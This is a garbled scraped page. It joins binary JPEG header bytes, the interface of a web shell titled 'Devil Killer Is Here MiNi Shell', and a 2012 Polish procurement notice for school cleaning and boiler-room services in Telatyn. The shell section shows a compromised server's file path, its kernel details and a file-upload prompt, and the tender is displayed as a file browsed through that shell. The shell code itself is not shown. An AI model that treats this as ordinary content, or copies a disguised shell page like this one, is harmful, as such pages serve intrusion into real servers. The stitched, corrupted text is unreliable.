JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120706/238512-N-2012.html

<p class="kh_header"><b>Telatyn: 1. Utrzymanie czystości  w Szkole Podstawowej im.Kardynała Stefana Wyszyńskiego w 
    Telatynie w okresie 01.09.2012r. -30.06.2013r.
      2. Obsługa i eksploatacja kotłowni szkolnej c .o . oraz instalacji c. o . w Szkole Podstawowej im.
          Kardynała Stefana Wyszyńskiego i Gimnazjum w Telatynie (w sezonie grzewczym     
           2012/2013  tj.15.10.2012r.-15.04.2013r.)</b><br>
<b>Numer ogłoszenia: 238512 - 2012; data zamieszczenia: 06.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Telatyn , ul. Fryderyka Chopina 10, 22-652 Telatyn, woj. lubelskie, tel. 84 6613110, faks 84 6613200.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1. Utrzymanie czystości  w Szkole Podstawowej im.Kardynała Stefana Wyszyńskiego w 
    Telatynie w okresie 01.09.2012r. -30.06.2013r.
      2. Obsługa i eksploatacja kotłowni szkolnej c .o . oraz instalacji c. o . w Szkole Podstawowej im.
          Kardynała Stefana Wyszyńskiego i Gimnazjum w Telatynie (w sezonie grzewczym     
           2012/2013  tj.15.10.2012r.-15.04.2013r.).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi polegające na:
1.	Utrzymaniu czystości w Szkole Podstawowej im. Kardynała Stefana Wyszyńskiego w  
      Telatynie w okresie 01.092012r.-30.06.2013r. 
    Szczegółowy zakres prac i obowiązków :
1. Sprzątanie codzienne za wyjątkiem dni wolnych od nauki obejmować będzie:
1/ sale szkolne (700 m2) 
2/ toalety / mycie ścian i posadzek/ ( 75 m2)
3/ korytarze, klatki schodowe, schody zewnętrzne i inne pomieszczenia szkolne (550 m2)
4/ teren przylegający / boisko / ( 4500 m2)
5/ szatnie/ (150m2)
2. Mycie okien - 4 razy w roku w  październiku ,listopadzie, kwietniu i maju. Okna otwierają 
     się do wewnątrz .
Wykonawca zobowiązany jest do utrzymania w należytym stanie sanitarno - porządkowym powierzchni poziomych i pionowych z uwzględnieniem, iż w salach szkolnych występują wykładziny, parkiet, płytki  lastriko , glazura i terakota. 
W toaletach występuje terakota .
3. Zakres prac związanych z utrzymaniem porządku przy sprzątaniu obejmuje :
1/ odkurzanie i czyszczenie wykładzin i dywanów.

str.3
2/ czyszczenie powierzchni podług ,parkietów i korytarzy z zastosowaniem środków  chemii 
gospodarczej które nie stwarzają   zagrożenia poślizgowego .
3/ czyszczenie i wycieranie kurzu z powierzchni ławek, biurek, szaf, szafek, parapetów, pulpitów, listew ściennych, drzwi , kaloryferów i itp.
4/ porządkowanie i dezynfekcja toalet, czyszczenie glazury łazienkowej, armatury łazienkowej , luster wiszących, zabezpieczenie toalet w papier toaletowy  i mydło w płynie oraz środki dezynfekujące i zapachowe. Po zakończeniu usługi Wykonawca maluje we własnym zakresie i z własnych materiałów łazienki, ubikacje i pomieszczenia gospodarcze.
5/ opróżnianie i czyszczenie koszy na śmieci
6/ mycie otworów okiennych / szyb i ram okiennych od wewnątrz i z zewnątrz /
polegające na tym, że technika mycia powinna być dostosowana do rodzaju okien - okna otwierają się do wewnątrz .
7/  pranie firan, zasłon nie mniej niż dwa razy w roku / wrzesień ,kwiecień /
8/ sprzątanie boiska oraz terenu przyległego do szkoły ,strzyżenie żywopłotu , pielenie rabatek i koszenie trawy   (dotyczy także terenu pomiędzy ogrodzeniem Szkoły  a drogą publiczną ) - wysokość porostu traw nie może przekraczać  - 10 cm . 
9/ podlewanie kwiatów w klasach i na korytarzach - w tym, w okresie ferii 
10/ zabezpieczyć wykonanie usługi ( obecność pracownika ) w trakcie zajęć pozalekcyjnych , dyskotek , uroczystości szkolnych i środowiskowych /akademie, wybory ,zebrania / - w terminach uzgodnionych z Dyrektorem Szkoły Podstawowej w tym, w dni wolne od pracy
4. Sprzątanie należy prowadzić w godzinach od 7.00 do 17.00 lub innych godzinach po uzgodnieniu z  Zamawiającym.
5. Należy zabezpieczyć co najmniej jednego pracownika zobowiązanego do stałego przebywania na terenie szkoły w godzinach jej pracy (wymagane  uzgodnienie z Dyrektorem Szkoły Podstawowej), do którego obowiązków należeć będzie:
a) bieżące sprzątanie obiektu
b) dzwonienie na lekcje i przerwy 
c) odśnieżanie , posypywanie chodników środkami  zapobiegającymi oblodzeniu (dotyczy również chodnika przy drodze publicznej przyległego do terenu Szkoły Podstawowej)
d) nadzór nad szatniami. ( szatnia jest otwarta z osobnymi boksami dla każdej klasy)
e)pilnowanie aby osoby postronne nie przebywały na terenie szkoły i szatni.
f) otwiera i zamyka Szkołę oraz ponosi pełną odpowiedzialność za jej zabezpieczenie podczas zajęć lekcyjnych i podczas wykonywania usługi.
6. Czynności porządkowe należy wykonywać po zajęciach lekcyjnych.
7. Środki czystości i sprzęt niezbędny do wykonania usługi zabezpiecza wykonawca na własny koszt.
8. Wykonuje drobne naprawy sprzętu szkolnego np. zamki, spłuczki itp. - zlecone przez Dyrektora Szkoły Podstawowej .Zakup sprzętu będzie po stronie Zamawiającego .
9. Z własnych środków wyposaża szkołę w środki czyszczące, piorące, dezynfekujące, ścierki, ręczniki, ręczniki jednorazowe do łazienek ( rolka kolorowe ), papier toaletowy (szary lub kolorowy ), mydło toaletowe w płynie z dozownikami.
10. W okresie  01.09.2012r.-15.10.2012r. i 15.04.2013r. -30.06.2013r.(z wyłączeniem sezonu grzewczego) oprócz przydzielonego rejonu zewnętrznego  dba o utrzymanie czystości na placu wybrukowanym płytami betonowymi w otoczeniu kotłowni .
11. Wykonuje niezbędne prace porządkowe w szkole i jej otoczeniu w okresie ferii zimowych i letnich (podlewanie kwiatów , koszenie trawy , strzyżenie żywopłotu, pielenie rabatek) w 2012r 
str.4
do 31.07.2013r oraz prace mające na celu przygotowanie obiektu do rozpoczęcia roku szkolnego w 2012/2013r oraz inne prace zlecone przez Dyrektora Szkoły Podstawowej a dotyczące 
utrzymania porządku w Szkole i obejściu .
2. Obsługa i eksploatacja kotłowni szkolnej c .o . oraz instalacji c. o . w Szkole Podstawowej im. Kardynała Stefana Wyszyńskiego i Gimnazjum w Telatynie (w sezonie grzewczym 2012/2013 tj.15.10.2012r.-15.04.2013r.)
      Szczegółowy zakres prac i obowiązków :
1. Obsługa i eksploatacja kotłowni szkolnej c.o. oraz instalacji c.o.
1/ obsługa pieców c.o.- kontrolowanie parametrów procesu spalania  oraz urządzeń towarzyszących-pompy wodne, odstojniki i inne.
2/ transport węgla do pomieszczeń kotłowni, pryzmowanie. 
3/ bieżąca oraz okresowa konserwacja kotłów, pomp, instalacji c.o. oraz pomieszczeń                                kotłowni.
4/ utrzymanie we wszystkich pomieszczeniach szkolnych w dniach nauki stałej temperatury   18-200 C.
  5/ przestrzegać obwiązujących przepisów w zakresie obsługi, eksploatacji kotłowni c.o. oraz instalacji grzewczych, przepisów BHP oraz p. pożarowych, w tym: przestrzegania obowiązujących norm czasu pracy osób pracujących przy obsłudze kotłowni - dotyczy również pracodawcy.
  6/ przestrzegać norm zużycia opału ustalonych przez Dyrektora Szkoły - systematycznie  prowadzić kontrolkę zużytego opału.
 7/ zapoznać się z INSTRUKCJĄ EKSPLOATACJI KOTŁOWNI i bezwzględnie jej przestrzegać .
 8/ przestrzeganie instrukcji obsługi kotłów c.o., pomp wodnych i instalacji grzewczej.
 9/ systematycznie uprzątać żużel w miejsce wskazane przez Dyrektora Szkoły.
2. Utrzymanie w należytym stanie technicznym urządzeń kotłowni i instalacji c.o. W              przypadku awarii spowodowanej z winy  wykonawcy usuwa awarię na własny koszt.
 1/ W okresie zimowym odśnieża dojście do kotłowni oraz otoczenie kotłowni i drogę  dojazdową dla pojazdów dowożących węgiel .
2/  Dba o utrzymanie czystości w otoczeniu kotłowni 
3. Ogrzewać budynek szkolny należy codziennie. W dniu nauki szkolnej należy zabezpieczyć temperaturę w pomieszczeniach klasowych określanych w punkcie 1. 4.W pozostałe dni w miarę potrzeb zabezpieczając pomieszczenia szkolne przed zbytnim wychłodzeniem a urządzenia kotłowni i instalacji grzewczej przed zamrożeniem.
4. Osoby pracujące w kotłowni zobowiązane są posiadać aktualne uprawnienia obowiązujące palacza c.o. i wkładkę energetyczną - okazać do wglądu przed rozpoczęciem sezonu .
5. Wszelkie zalecenia pokontrolne wynikające z bieżącej pracy kotłowni wykonuje wykonawca we własnym zakresie i z własnych środków. 
 6. Wykonawca ponosi pełną odpowiedzialność przed jednostkami kontrolującymi.
7. Urządzenia i sprzęt niezbędny do transportu EKO -Groszku z placu do kotłowni zabezpiecza Wykonawca.
8. Wykonawca z własnych środków wyposaża kotłownię w środki czyszczące, piorące, dezynfekujące, ścierki, ręczniki oraz ubrania ochronne dla zatrudnionych pracowników.
9. Z własnych środków po zakończeniu sezonu grzewczego maluje pomieszczenia kotłowni oraz konserwuje i zabezpiecza urządzenia i kotły.
10. Wykonawca zobowiązany jest w uzgodnieniu z Dyrektorem Szkoły obsłużyć uroczystości i 
str.5
zajęcia szkolne w dniach wolnych od pracy .
11. Na polecenie Dyrektora Szkoły wykonuje inne prace związane z obsługą kotłowni, kotłów i 
instalacji c.o.
Dopuszcza się możliwość składania ofert częściowych:.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.76.00.00-4, 93.90.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek dotyczący posiadania uprawnień do wykonania określonej działalności lub czynności zostanie uznany przez zamawiającego za spełniony jeżeli wykonawca wykaże  że osoby które będą wykonywać zamówienie posiadają wymagane uprawnienia jeśli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek dotyczący posiadania wiedzy i doświadczenia zostanie uznany przez zamawiającego za spełniony jeżeli wykonawca wykaże wykonanie w ciągu ostatnich 
      trzech lat przed upływem terminu składnia ofert, a jeżeli okres prowadzenia działalności      
      jest krótszy - w tym okresie, minimum 1 zadanie w zakresie utrzymania czystości w obiektach / obsługi i eksploatacji kotłowni o wartości co najmniej  15000. zł. brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia zostanie uznany przez zamawiającego za spełniony jeżeli wykonawca wykaże dysponowanie osobami, które będą uczestniczyć w wykonywaniu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 PZP przewiduje możliwość zmiany w treści zawartej umowy w stosunku do treści oferty w przypadku zmiany stawki VAT przez ustawodawcę w trakcie trwania usługi wynagrodzenie miesięczne będzie zmienione o tą różnicę .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp.telatyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa w Telatynie
ul. Wyszyńskiego 22
22-652  Telatyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.07.2012 godzina 10:00, miejsce: Urząd Gminy w Telatynie ul. Wyszyńskiego 22,
22-652 Telatyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymaniu czystości w Szkole Podstawowej im. Kardynała Stefana Wyszyńskiego w  Telatynie w okresie 01.092012r.-30.06.2013r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi polegające na:
1.	Utrzymaniu czystości w Szkole Podstawowej im. Kardynała Stefana Wyszyńskiego w  
      Telatynie w okresie 01.092012r.-30.06.2013r. 
    Szczegółowy zakres prac i obowiązków :
1. Sprzątanie codzienne za wyjątkiem dni wolnych od nauki obejmować będzie:
1/ sale szkolne (700 m2) 
2/ toalety / mycie ścian i posadzek/ ( 75 m2)
3/ korytarze, klatki schodowe, schody zewnętrzne i inne pomieszczenia szkolne (550 m2)
4/ teren przylegający / boisko / ( 4500 m2)
5/ szatnie/ (150m2)
2. Mycie okien - 4 razy w roku w  październiku ,listopadzie, kwietniu i maju. Okna otwierają 
     się do wewnątrz .
Wykonawca zobowiązany jest do utrzymania w należytym stanie sanitarno - porządkowym powierzchni poziomych i pionowych z uwzględnieniem, iż w salach szkolnych występują wykładziny, parkiet, płytki  lastriko , glazura i terakota. 
W toaletach występuje terakota .
3. Zakres prac związanych z utrzymaniem porządku przy sprzątaniu obejmuje :
1/ odkurzanie i czyszczenie wykładzin i dywanów
2/ czyszczenie powierzchni podług ,parkietów i korytarzy z zastosowaniem środków  chemii 
gospodarczej które nie stwarzają   zagrożenia poślizgowego .
3/ czyszczenie i wycieranie kurzu z powierzchni ławek, biurek, szaf, szafek, parapetów, pulpitów, listew ściennych, drzwi , kaloryferów i itp.
4/ porządkowanie i dezynfekcja toalet, czyszczenie glazury łazienkowej, armatury łazienkowej , luster wiszących, zabezpieczenie toalet w papier toaletowy  i mydło w płynie oraz środki dezynfekujące i zapachowe. Po zakończeniu usługi Wykonawca maluje we własnym zakresie i z własnych materiałów łazienki, ubikacje i pomieszczenia gospodarcze.
5/ opróżnianie i czyszczenie koszy na śmieci
6/ mycie otworów okiennych / szyb i ram okiennych od wewnątrz i z zewnątrz /
polegające na tym, że technika mycia powinna być dostosowana do rodzaju okien - okna otwierają się do wewnątrz .
7/  pranie firan, zasłon nie mniej niż dwa razy w roku / wrzesień ,kwiecień /
8/ sprzątanie boiska oraz terenu przyległego do szkoły ,strzyżenie żywopłotu , pielenie rabatek i koszenie trawy   (dotyczy także terenu pomiędzy ogrodzeniem Szkoły  a drogą publiczną ) - wysokość porostu traw nie może przekraczać  - 10 cm . 
9/ podlewanie kwiatów w klasach i na korytarzach - w tym, w okresie ferii 
10/ zabezpieczyć wykonanie usługi ( obecność pracownika ) w trakcie zajęć pozalekcyjnych , dyskotek , uroczystości szkolnych i środowiskowych /akademie, wybory ,zebrania / - w terminach uzgodnionych z Dyrektorem Szkoły Podstawowej w tym, w dni wolne od pracy
4. Sprzątanie należy prowadzić w godzinach od 7.00 do 17.00 lub innych godzinach po uzgodnieniu z  Zamawiającym.
5. Należy zabezpieczyć co najmniej jednego pracownika zobowiązanego do stałego przebywania na terenie szkoły w godzinach jej pracy (wymagane  uzgodnienie z Dyrektorem Szkoły Podstawowej), do którego obowiązków należeć będzie:
a) bieżące sprzątanie obiektu
b) dzwonienie na lekcje i przerwy 
c) odśnieżanie , posypywanie chodników środkami  zapobiegającymi oblodzeniu (dotyczy również chodnika przy drodze publicznej przyległego do terenu Szkoły Podstawowej)
d) nadzór nad szatniami. ( szatnia jest otwarta z osobnymi boksami dla każdej klasy)
e)pilnowanie aby osoby postronne nie przebywały na terenie szkoły i szatni.
f) otwiera i zamyka Szkołę oraz ponosi pełną odpowiedzialność za jej zabezpieczenie podczas zajęć lekcyjnych i podczas wykonywania usługi.
6. Czynności porządkowe należy wykonywać po zajęciach lekcyjnych.
7. Środki czystości i sprzęt niezbędny do wykonania usługi zabezpiecza wykonawca na własny koszt.
8. Wykonuje drobne naprawy sprzętu szkolnego np. zamki, spłuczki itp. - zlecone przez Dyrektora Szkoły Podstawowej .Zakup sprzętu będzie po stronie Zamawiającego .
